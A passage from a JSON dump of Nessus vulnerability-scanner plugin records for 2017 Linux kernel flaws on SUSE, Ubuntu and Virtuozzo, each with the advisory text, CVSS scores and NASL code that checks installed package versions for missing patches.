audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-default-man-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-base-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-base-debuginfo-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-debuginfo-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-debugsource-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-devel-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-syms-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-devel-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-extra-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-syms-4.4.90-92.50.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-09T05:39:02", "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed\nin the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle\ncopy-on- write of transparent huge pages. A local attacker could use\nthis to cause a denial of service (application crashes) or possibly\ngain administrative privileges. (CVE-2017-1000405).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-08T00:00:00", "title": "Ubuntu 14.04 LTS : linux vulnerabilities (USN-3510-1) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "modified": "2017-12-08T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic"], "id": "UBUNTU_USN-3510-1.NASL", "href": "https://www.tenable.com/plugins/nessus/105106", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3510-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105106);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/04\");\n\n script_cve_id(\"CVE-2017-1000405\", \"CVE-2017-16939\");\n script_xref(name:\"USN\", value:\"3510-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux vulnerabilities (USN-3510-1) (Dirty COW)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Mohamed Ghannam discovered that a use-after-free vulnerability existed\nin the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle\ncopy-on- write of transparent huge pages. A local attacker could use\nthis to cause a denial of service (application crashes) or possibly\ngain administrative privileges. (CVE-2017-1000405).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3510-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2020 Canonical, Inc. / NASL script (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000405\", \"CVE-2017-16939\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3510-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-137-generic\", pkgver:\"3.13.0-137.186\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-137-generic-lpae\", pkgver:\"3.13.0-137.186\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-137-lowlatency\", pkgver:\"3.13.0-137.186\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic\", pkgver:\"3.13.0.137.146\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic-lpae\", pkgver:\"3.13.0.137.146\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"3.13.0.137.146\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-09T05:39:07", "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed\nin the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle\ncopy-on- write of transparent huge pages. A local attacker could use\nthis to cause a denial of service (application crashes) or possibly\ngain administrative privileges. (CVE-2017-1000405).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-08T00:00:00", "title": "Ubuntu 16.04 LTS : linux-azure vulnerabilities (USN-3511-1) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "modified": "2017-12-08T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.11-azure", "p-cpe:/a:canonical:ubuntu_linux:linux-image-azure"], "id": "UBUNTU_USN-3511-1.NASL", "href": "https://www.tenable.com/plugins/nessus/105107", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3511-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105107);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/04\");\n\n script_cve_id(\"CVE-2017-1000405\", \"CVE-2017-16939\");\n script_xref(name:\"USN\", value:\"3511-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS : linux-azure vulnerabilities (USN-3511-1) (Dirty COW)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Mohamed Ghannam discovered that a use-after-free vulnerability existed\nin the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle\ncopy-on- write of transparent huge pages. A local attacker could use\nthis to cause a denial of service (application crashes) or possibly\ngain administrative privileges. (CVE-2017-1000405).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3511-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected linux-image-4.11-azure and / or linux-image-azure\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.11-azure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-azure\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2020 Canonical, Inc. / NASL script (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000405\", \"CVE-2017-16939\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3511-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.11.0-1016-azure\", pkgver:\"4.11.0-1016.16\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-azure\", pkgver:\"4.11.0.1016.16\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.11-azure / linux-image-azure\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:13:20", "description": "According to the versions of the parallels-server-bm-release /\nvzkernel / etc packages installed, the Virtuozzo installation on the\nremote host is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 32, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-18T00:00:00", "title": "Virtuozzo 6 : parallels-server-bm-release / vzkernel / etc (VZA-2017-114)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8824", "CVE-2017-16939"], "modified": "2017-12-18T00:00:00", "cpe": ["p-cpe:/a:virtuozzo:virtuozzo:vzkernel", "p-cpe:/a:virtuozzo:virtuozzo:vzkernel-devel", "p-cpe:/a:virtuozzo:virtuozzo:vzkernel-firmware", "p-cpe:/a:virtuozzo:virtuozzo:vzmodules", "cpe:/o:virtuozzo:virtuozzo:6", "p-cpe:/a:virtuozzo:virtuozzo:parallels-server-bm-release", "p-cpe:/a:virtuozzo:virtuozzo:vzmodules-devel"], "id": "VIRTUOZZO_VZA-2017-114.NASL", "href": "https://www.tenable.com/plugins/nessus/105324", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105324);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-16939\",\n \"CVE-2017-8824\"\n );\n\n script_name(english:\"Virtuozzo 6 : parallels-server-bm-release / vzkernel / etc (VZA-2017-114)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the parallels-server-bm-release /\nvzkernel / etc packages installed, the Virtuozzo installation on the\nremote host is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2910907\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected parallels-server-bm-release / vzkernel / etc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:parallels-server-bm-release\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzkernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzkernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzkernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzmodules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzmodules-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 6.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"parallels-server-bm-release-6.0.12-3689\",\n \"vzkernel-2.6.32-042stab126.2\",\n \"vzkernel-devel-2.6.32-042stab126.2\",\n \"vzkernel-firmware-2.6.32-042stab126.2\",\n \"vzmodules-2.6.32-042stab126.2\",\n \"vzmodules-devel-2.6.32-042stab126.2\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-6\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"parallels-server-bm-release / vzkernel / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-09T05:38:56", "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed\nin the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle\ncopy-on- write of transparent huge pages. A local attacker could use\nthis to cause a denial of service (application crashes) or possibly\ngain administrative privileges. (CVE-2017-1000405)\n\nYonggang Guo discovered that a race condition existed in the driver\nsubsystem in the Linux kernel. A local attacker could use this to\npossibly gain administrative privileges. (CVE-2017-12146).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-08T00:00:00", "title": "Ubuntu 17.04 : linux, linux-raspi2 vulnerabilities (USN-3508-1) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12146", "CVE-2017-16939", "CVE-2017-1000405"], "modified": "2017-12-08T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2", "cpe:/o:canonical:ubuntu_linux:17.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-raspi2", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic"], "id": "UBUNTU_USN-3508-1.NASL", "href": "https://www.tenable.com/plugins/nessus/105102", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3508-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105102);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/04\");\n\n script_cve_id(\"CVE-2017-1000405\", \"CVE-2017-12146\", \"CVE-2017-16939\");\n script_xref(name:\"USN\", value:\"3508-1\");\n\n script_name(english:\"Ubuntu 17.04 : linux, linux-raspi2 vulnerabilities (USN-3508-1) (Dirty COW)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Mohamed Ghannam discovered that a use-after-free vulnerability existed\nin the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle\ncopy-on- write of transparent huge pages. A local attacker could use\nthis to cause a denial of service (application crashes) or possibly\ngain administrative privileges. (CVE-2017-1000405)\n\nYonggang Guo discovered that a race condition existed in the driver\nsubsystem in the Linux kernel. A local attacker could use this to\npossibly gain administrative privileges. (CVE-2017-12146).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3508-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", 